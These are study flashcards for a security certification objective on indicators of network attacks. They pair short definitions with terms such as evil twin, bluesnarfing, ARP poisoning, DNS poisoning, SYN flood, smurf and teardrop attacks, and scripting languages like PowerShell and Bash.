1.4 Analyze potential indicators associated with network attacks Flashcards
Used to detect the presence of a wireless network.
Wireless scanner/cracker
An attack in which a hacker operates a false access point that will automatically clone, or twin, the identity of an access point based on a client device’s request to connect.
Evil twin attack
May be planted by an employee for convenience, or it may be operated externally by an attacker.
Rogue access point
The unauthorized accessing of data via a Bluetooth connection.
Bluesnarfing
Grants an attacker remote control over the hardware and software of your devices over a Bluetooth connection.
Bluebugging
The sending of unsolicited messages to Bluetooth capable devices without the permission of the owner/user.
Bluejacking
Eavesdropping or packet capturing Bluetooth communications.
Bluesniffing
A DoS attack against a Bluetooth device.
Bluesmacking
A type of wireless management frame that can be used in wireless attacks, including discovering hidden SSIDs, causing a DoS, hijacking sessions, and on-path.
Disassociation
The transmission of radio signals to prevent reliable communications by decreasing the effective signal-to-noise ratio.
Jamming
A tracking technology based on the ability to power a radio transmitter using current generated in an antenna when placed in a magnetic field.
Radio frequency identification
A standard to establish radio communications between devices in close proximity. It is commonly employed for contactless payments.
Near field communication (NFC)
A mathematical and cryptographic term for a random number.
Initialization vector (IV)
A communications eavesdropping attack. Attackers position themselves in the communication stream between a client and server.
On-path attack
When the malware is operating on the victim’s system.
Browser on-path attack
A form of attack in which malicious content is submitted to a vulnerable application, typically a web browser or web server, under the guise of a valid HTML/HTTP header value.
(
HTTP Header manipulation
The act of falsifying the IP-to-MAC address resolution system employed by TCP/IP.
ARP poisoning
Uses a flooding attack to compromise a switch so that the switch gets stuck into flooding all network communications.
MAC flooding
Used to impersonate another system, often a valid or authorized network device to bypass port security or MAC filtering limitation.
MAC cloning/spoofing
The falsification of the source address of network packets. As a result, victims are unable to locate the true attackers or initiators of a communication. Also, the attacker may use this against the source address to redirect packet responses, replies, and echoes to some other system.
IP spoofing
the hierarchical naming scheme used in both public and private networks. This links human-friendly fully qualified domain names (FQDNs) and IP addresses together.
Domain name system (DNS)
The malicious action of changing the registration of a domain name without the authorization of the valid owner.
Domain hijacking
The act of falsifying the DNS information used by a client to reach a desired system.
DNS poisoning
Is a means to make a web page available through multiple URL addresses or domain names a.k.a. URL forwarding.
URL redirection
A scoring system that can be used to determine whether your communications or your site is more likely legitimate or more likely malicious or fraudulent. Sometimes this is called a sender score, especially when it is focusing on email.
Domain reputation
A form of attack that has the primary goal of preventing the victimized system from performing legitimate activity or responding to legitimate traffic.
Denial of service (DoS)
Attacks are waged by first compromising or infiltrating one or more intermediary systems (i.e., bots) that serve as a launch points or attack platforms.
Distributed denial of service (DDoS)
Employs an amplification or bounce network that is an unwilling or unknowing participant that is unfortunately able to receive broadcast messages and create message responses, echoes , or bounces.
Distributed reflective denial-of-service (DRDoS)
This DRDoS attack uses ICMP echo reply packets (ping packets).
Smurf attack
This DRDoS uses UDP packets.
Fraggle attack
This DoS attack exploits the TCP three way handshake and results in resource exhaustion.
SYN flood
The attacker sends fragments to a victim that when re-assembled result in an oversized ping packet causing a buffer overflow.
Ping of death
Uses the Xmas scan to perform a DoS.
Xmas attack
A partial transmission of fragmented packets causing the target to consume system resources holding onto incomplete reassembles.
Teardrop attack
A SYN flood attack where the source and destination address are both said to be victims address, which causes a logical error.
Land attack
An attack where the amount of work or traffic generated by an attacker is multiplied to DoS the victim.
Amplification attacks
Administrators need to analyze and the site for the potential indicators that are associated with Netwerk attacks that may have been caused by malicious code or malicious script execution.
Malicious code or script execution
Both a scripting language as well as a commandline shell for Microsoft Windows. PowerShell can be used to write malicious scripts.
Powershell
A scripting programming language that is popular. Python can be used to write malicious scripts.
Python
A command shell and a scripting language. Bash can be used to write malicious scripts.
Bash
A program or script written in a language that is embedded into specific files. These can be a powerful tool for automating tasks, but they can also be employed for malicious purposes.
Macros
A powerful programming language that is built into productivity documents. It is the primary language that Office macros are written in.
Visual Basic for Applications
